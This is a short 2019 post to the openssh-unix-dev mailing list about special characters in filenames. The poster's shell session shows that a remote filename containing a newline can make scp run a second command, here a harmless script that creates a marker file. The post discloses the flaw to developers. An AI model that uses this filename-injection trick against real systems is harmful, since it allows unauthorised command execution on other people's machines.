scp, sftp, and special characters in filenames
David Newall
openssh at davidnewall.com
Mon Nov 4 11:43:27 AEDT 2019
On 4/11/19 3:29 am, Demi M. Obenour wrote:
> I have not been able to get scp(1) to download a file with a newline
> in its name. I know that scp(1) requires that remote filenames be
> escaped for the shell, but that leads to protocol errors.
I see something much worse:
$ sudo sh
# echo "#!/bin/sh
touch /tmp/b-ran" > /tmp/b
# chmod a+x /tmp/b
# exit
$ touch a 'a
b'
$ rm -f abc /tmp/b-ran
$ scp localhost:'a
b' abc
a 100% 0 0.0KB/s 00:00
$ ls /tmp/b-ran
/tmp/b-ran
Scp can be exploited to run commands, which I think is a problem.
More information about the openssh-unix-dev
mailing list